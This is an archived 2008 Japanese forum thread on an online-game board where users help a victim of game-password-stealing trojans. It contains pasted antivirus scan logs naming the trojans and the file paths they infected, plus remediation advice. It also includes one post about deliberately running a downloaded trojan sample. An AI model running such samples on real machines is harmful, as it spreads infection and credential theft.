962 :既にその名前は使われています:2008/03/24(月) 01:41:45.99 ID:kK/PADZl
例え同居の家族親族で、本人の事情やキャラ事情の確認内容を正しく伝えられたとしても
本人でない限りサポセンでは対応してくれないよ
特にアカウントに関する事はね。
初期の頃は甘かったけどここ数年はNO

性別が同じで最初から本人に成りすましての問い合わせでもない限り
本人から委任された代理だと口頭で伝えようが無理だよ。

963 :既にその名前は使われています:2008/03/24(月) 01:42:30.95 ID:0jHdHBFL
厨蚊IP蹴るようにルータの設定した方が早いな


964 :既にその名前は使われています:2008/03/24(月) 01:52:43.60 ID:Q/ktx4QO
>>946
ただなぁ...
実際の被害者は、ユーザではなく、サービスに不正ログインされた□eなんだよね。
ID/pwの管理はユーザ任せだから、□eに責はないんだ。

といっても、ノートでどこでもできるから、IP+ID/pw認証もユーザの申告制になるし
どこまで認証を厳しくするか、微妙

>>948
ttp://www.viruslist.com/en/viruses/encyclopedia?virusid=250983
まだ検体がなくて解析されてないらしいので、PCに詳しい友人または自分で
検体(感染してるファイル)を各ウィルスソフト屋に提出しよう。

>>949
過去ログ見ろ。

965 :既にその名前は使われています:2008/03/24(月) 01:56:21.26 ID:Q/ktx4QO
>>956
ttp://www.viruslist.com/en/viruses/encyclopedia?virusid=269574
>Downloader.Win32.Delf.dsz
>>959のワームをダウンロードさせたワームだね

966 :既にその名前は使われています:2008/03/24(月) 02:02:20.63 ID:Q/ktx4QO
>>959
違う。
>>956のはワームのダウンローダで、
>>948がID/pw保存ファイルを抜いてる。
ID/pw保存ファイルを送信するやつがもう1つあるはず。

967 :既にその名前は使われています:2008/03/24(月) 02:05:29.69 ID:Q/ktx4QO
>>960
「はじめてのネットワーク」みたいな本を見てみてくれ。
先の以上に詳しく説明すると、スレ丸ごといるw

PCのコンパネからネットワーク開いて、
グローバルアドレス(プロバイダからもらったIPに似たような数値)に
なってないことだけ確認しておけ。

968 :既にその名前は使われています:2008/03/24(月) 02:09:40.45 ID:ZfckpKA+
今、ターゲットの選択: マイ コンピュータ
ソース: A:\; C:\; D:\; E:\; F:\; G:\;

をオンラインスキャンしてますがまだまだ時間がかかりそうです。

>>964->>966
もう一つですか…結果が出たら報告します<(_ _)>

今の場所が終わるまで2時間近くかかりそうなので…orz

969 :既にその名前は使われています:2008/03/24(月) 02:11:34.67 ID:Vn0/fEwr
今までバスター使ってたけど、ここを見て不安になったのでカスペルスキーの30日体験版を導入。
いま完全スキャン中なんだけど、終わる予定が5時ってw
バスターさんのスキャンは1時間足らずだったんだけど、これがカスペルの普通なんでしょうか?

970 :既にその名前は使われています:2008/03/24(月) 02:13:47.30 ID:DyD4MS3I
カスペは初回のスキャンが遅いけど次回から(爆)速

971 :既にその名前は使われています:2008/03/24(月) 02:13:59.85 ID:QdOH9ZPy
Trojan-Downloader.Win32.Agent.kgv
Trojan-Downloader.Win32.Agent.kht

これがウイルスですか?

972 :既にその名前は使われています:2008/03/24(月) 02:15:56.97 ID:Q/ktx4QO
>>971
>>966

973 :既にその名前は使われています:2008/03/24(月) 02:21:16.81 ID:DyD4MS3I
FlashGet(久々に見たなコレ)も脆弱性つかれてトロイ感染源になっとったのかよ

974 :既にその名前は使われています:2008/03/24(月) 02:27:04.14 ID:Q/ktx4QO
ID : ZfckpKA+
次回から、感染してたファイル名もあるとうれしい。
ウィルス対策ソフト会社によって名前違うんだわ。

日本語版でかなり近いものの解説を見つけたのではっとく
 ttp://www.mcafee.com/japan/security/virPQ2007.asp?v=PWS-Mmorpg.gen
たぶん、こいつの亜種で、FFXIターゲットなんだと思う。
ゆえに、だれも検体を出してないから、詳細の解析がなされてないと思われる。

975 :既にその名前は使われています:2008/03/24(月) 02:38:26.70 ID:8uqZSA/X
今夜ハックされてた人はブログ閲覧から感染したのかな?

976 :既にその名前は使われています:2008/03/24(月) 02:44:56.58 ID:0jHdHBFL
とりあえず、ハックされてない奴もされた奴も
パッチは全部当てとけよ
あと、有名所のアンチウイルスソフトのHPでは
無料のオンラインスキャンを用意しているから
金の無い奴は活用すると良い


977 :既にその名前は使われています:2008/03/24(月) 02:46:05.24 ID:ZfckpKA+
>>974
レポートからのコピーですが貼っておきますね。

・重要な領域
E:\WINDOWS\Help\3EC849F38E63.dll 感染: Trojan-PSW.Win32.OnLineGames.lbb
E:\WINDOWS\Help\3EC849F38E63.exe 感染: Trojan-PSW.Win32.OnLineGames.lbb
E:\WINDOWS\system32\1.exe 感染: Trojan-PSW.Win32.OnLineGames.lbb
E:\WINDOWS\system32\2.exe 感染: Trojan-PSW.Win32.OnLineGames.fcj
E:\WINDOWS\system32\explorerf.exe 感染: Trojan-PSW.Win32.OnLineGames.fcj
E:\WINDOWS\system32\krnp32drv.dll 感染: Trojan-PSW.Win32.OnLineGames.pnr
E:\WINDOWS\system32\systemlf.dll 感染: Trojan-PSW.Win32.OnLineGames.fcj

・メモリ領域
ウイルス名 前回の処理
[0] [System Process] => E:\WINDOWS\hELP\3EC849F38E63.dll 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
[0] [System Process] => E:\WINDOWS\system32\systemlf.dll 感染: Trojan-PSW.Win32.OnLineGames.fcj スキップ
[0] [System Process] => E:\Program Files\Common Files\Microsoft Shared\MSINFO\SysInfo.wmp 感染: Trojan-Downloader.Win32.Delf.dsz スキップ
つづきます

978 :既にその名前は使われています:2008/03/24(月) 02:46:44.69 ID:ZfckpKA+
[1468] explorer.exe => E:\Program Files\Common Files\Microsoft Shared\MSINFO\SysInfo.wmp 感染: Trojan-Downloader.Win32.Delf.dsz スキップ
[1468] explorer.exe => E:\WINDOWS\hELP\3EC849F38E63.dll 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
[1468] explorer.exe => E:\WINDOWS\system32\systemlf.dll 感染: Trojan-PSW.Win32.OnLineGames.fcj スキップ
[1560] mixer.exe => E:\WINDOWS\hELP\3EC849F38E63.dll 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
[1608] apdproxy.exe => E:\WINDOWS\hELP\3EC849F38E63.dll 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
[1616] aMPStation.exe => E:\WINDOWS\hELP\3EC849F38E63.dll 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
[1624] PDVDServ.exe => E:\WINDOWS\hELP\3EC849F38E63.dll 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
[1632] qttask.exe => E:\WINDOWS\hELP\3EC849F38E63.dll 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
[1672] IPv6RExUI.exe => E:\WINDOWS\hELP\3EC849F38E63.dll 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
[1680] rundll32.exe => E:\WINDOWS\hELP\3EC849F38E63.dll 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
[1688] explorerf.exe => E:\WINDOWS\system32\explorerf.exe 感染: Trojan-PSW.Win32.OnLineGames.fcj スキップ
[1688] explorerf.exe => E:\WINDOWS\system32\systemlf.dll 感染: Trojan-PSW.Win32.OnLineGames.fcj スキップ
[1696] ctfmon.exe => E:\WINDOWS\hELP\3EC849F38E63.dll 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
[1740] TabUserW.exe => E:\WINDOWS\hELP\3EC849F38E63.dll 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ

979 :既にその名前は使われています:2008/03/24(月) 02:47:12.83 ID:EkJgurYg
早めに次スレを

980 :既にその名前は使われています:2008/03/24(月) 02:47:25.24 ID:ZfckpKA+
[3340] rundll32.exe => E:\WINDOWS\hELP\3EC849F38E63.dll 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
[2468] Jane2ch.exe => E:\WINDOWS\hELP\3EC849F38E63.dll 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
[2468] Jane2ch.exe => E:\WINDOWS\system32\systemlf.dll 感染: Trojan-PSW.Win32.OnLineGames.fcj スキップ
[2468] Jane2ch.exe => E:\Program Files\Common Files\Microsoft Shared\MSINFO\SysInfo.wmp 感染: Trojan-Downloader.Win32.Delf.dsz スキップ
[2708] iexplore.exe => E:\WINDOWS\hELP\3EC849F38E63.dll 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
[2708] iexplore.exe => E:\WINDOWS\system32\systemlf.dll 感染: Trojan-PSW.Win32.OnLineGames.fcj スキップ
[2708] iexplore.exe => E:\Program Files\Common Files\Microsoft Shared\MSINFO\SysInfo.wmp 感染: Trojan-Downloader.Win32.Delf.dsz スキップ
[2232] WLLoginProxy.exe => E:\WINDOWS\hELP\3EC849F38E63.dll 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
[4060] notepad.exe => E:\WINDOWS\hELP\3EC849F38E63.dll 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
[4060] notepad.exe => E:\WINDOWS\system32\systemlf.dll 感染: Trojan-PSW.Win32.OnLineGames.fcj

今のところはこんな感じです<(_ _)>少しでも解決の手がかりになれば、です。

981 :既にその名前は使われています:2008/03/24(月) 02:47:25.80 ID:7DTVIQ6X
>>975
ほぼそうだと思う
被害者は相当数いるんじゃないか?
抜いたパスを処理し切れてない様子だから来週もまた増えるだろうな

982 :既にその名前は使われています:2008/03/24(月) 02:48:36.05 ID:7DTVIQ6X
スレたてチャレンジしてみるわ

983 :既にその名前は使われています:2008/03/24(月) 02:52:31.34 ID:vQXYTLxz
今現在パス抜きされてないから安全と考えるのは早計。
業者の順次処理待ちに並んでるだけかもしれない。

984 :既にその名前は使われています:2008/03/24(月) 02:55:27.08 ID:7DTVIQ6X
たてといた
http://live27.2ch.net/test/read.cgi/ogame/1206294621/

テンプレやっぱちょっと長すぎる感があるな

985 :既にその名前は使われています:2008/03/24(月) 03:00:11.05 ID:Q/ktx4QO
>>977
PSW.Win32.OnLineGamesがずらっといるところを見ると、
各種MMO対応型臭いな。
つか、こんだけ常駐してると、メモリもCPUも食うから重くならなかった?

どうすっかな。
検体の代理提出してもいいが、あぷろだ経由ってわけにもいかぬな。
かといって、メアドもお互い不幸になるしなw
ひとまず、これ見て提出準備できるか考えてみて。
 ttp://www.mcafee.com/japan/security/contactavert.asp

986 :既にその名前は使われています:2008/03/24(月) 03:01:23.01 ID:ZfckpKA+
ターゲットの選択: マイ コンピュータ
ソース: A:\; C:\; D:\; E:\; F:\; G:\;

スキャンの実行 [54%]:

スキャンしたファイル: 123974
見つかったウイルス: 7
感染したオブジェクト: 28
疑わしいオブジェクト: 7

今のところこのぐらいです。かなりありますorz
あと1時間半ぐらいなので、少し寝ます。
またあとで報告しに来ます<(_ _)>

たくさん励ましたもらってありがとうございます!
とにかく解決までがんばります<(_ _)>

987 :既にその名前は使われています:2008/03/24(月) 03:02:50.09 ID:ZfckpKA+
>>985
あ、かなり重かったです。パソコンが古いからそれが原因かなと思ってました。
参考のアドレス、見ておきますね。

988 :既にその名前は使われています:2008/03/24(月) 03:03:21.56 ID:Q/ktx4QO
>>984
Wiki化するか、有志でどこぞの無料HP取って作るかだなや

989 :既にその名前は使われています:2008/03/24(月) 03:09:45.52 ID:IxSaroBR
ID:ZfckpKA+にちょっと聞きたい。
P2Pやってるとかってオチないよね?
ちょっと腑に落ちない点があったので

990 :既にその名前は使われています:2008/03/24(月) 03:12:48.64 ID:0jHdHBFL
最近のウィルスは複数の脆弱制に対応してたりするからな
一つでも穴があれば感染しまくっても不思議じゃない

991 :既にその名前は使われています:2008/03/24(月) 03:16:14.93 ID:Q/ktx4QO
>>987
寝て落ち着いてからにしなされ。
まずは、サポセンに電話して、アカウントを丸ごと止めさせるんだ。

次に、スキャンが終わってたら、PCをネットからケーブルごと引っこ抜け。
感染している以上、外部から完全に掌握されていると思ってくれ。

それから、ブラウザの履歴見て、PCの動作ががつんと重くなったと
感じたあたりを思い出してみて。
ポイント的には、なんちゃら.jp以外のところ。

そして、ワームの検体の提出を考えるのは最後にすること。
なぜなら、既に検出できてるわけだから。

992 :既にその名前は使われています:2008/03/24(月) 03:17:48.67 ID:BS8RD3fS
次スレ乙
うめるか

993 :既にその名前は使われています:2008/03/24(月) 03:19:11.91 ID:Q/ktx4QO
>>989
原因探求は、まずアカウント止めさせる手続きをしてもらってから考えてもらおうや。
P2Pも含めて、自分が動かしてたと認識してるソフトを列挙してもらわないとならん。

994 :既にその名前は使われています:2008/03/24(月) 03:21:25.80 ID:ddVbsWZc
>>952 >>958
ありがとうございます。
今のところ大丈夫っぽいみたいでした

995 :既にその名前は使われています:2008/03/24(月) 03:21:41.39 ID:Q/ktx4QO
埋めるな。埋めたらこの情報が全部落ちるんだぞ

996 :既にその名前は使われています:2008/03/24(月) 03:22:36.04 ID:+9ScgTsR
1000

997 :既にその名前は使われています:2008/03/24(月) 03:34:48.58 ID:8jcNID1A
>>57>>63のxia.exeがTrojan-Downloader.Win32.Delf.dszなんで
落として実行してみた
カスペのオンラインスキャンを掛けようとするとIEを落とされるので
試用版をインストールしてスキャン中
当たりっぽい


998 :既にその名前は使われています:2008/03/24(月) 03:37:54.55 ID:Q/ktx4QO
>>997
単品なら、ここでチェックさせられる。
 ttp://www.kaspersky.co.jp/scanforvirus

999 :既にその名前は使われています:2008/03/24(月) 03:40:38.66 ID:fJ5F8Y4D
埋めついでに。

Sleipnirを長く使ってきたが、これを機にSafariを試してみた。
インストールが終わって、起動・・・することもなく異常終了した。

1000

1000 :既にその名前は使われています:2008/03/24(月) 03:42:31.26 ID:IxSaroBR
1000なら

1001 :1001:Over 1000 Thread
  === Area: Live Networkgames@2ch http://live27.2ch.net/ogame/ ===

      //
    / .人      あ、ぽこたんインできないお!
    /  (__) パカ
   / ∩(____)       このスレッドは1000を超えたお。。。
   / .|( ・∀・)_       もう書けないので、新しいスレッドにインするお!
  // |   ヽ/
  " ̄ ̄ ̄"∪


283 KB
★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)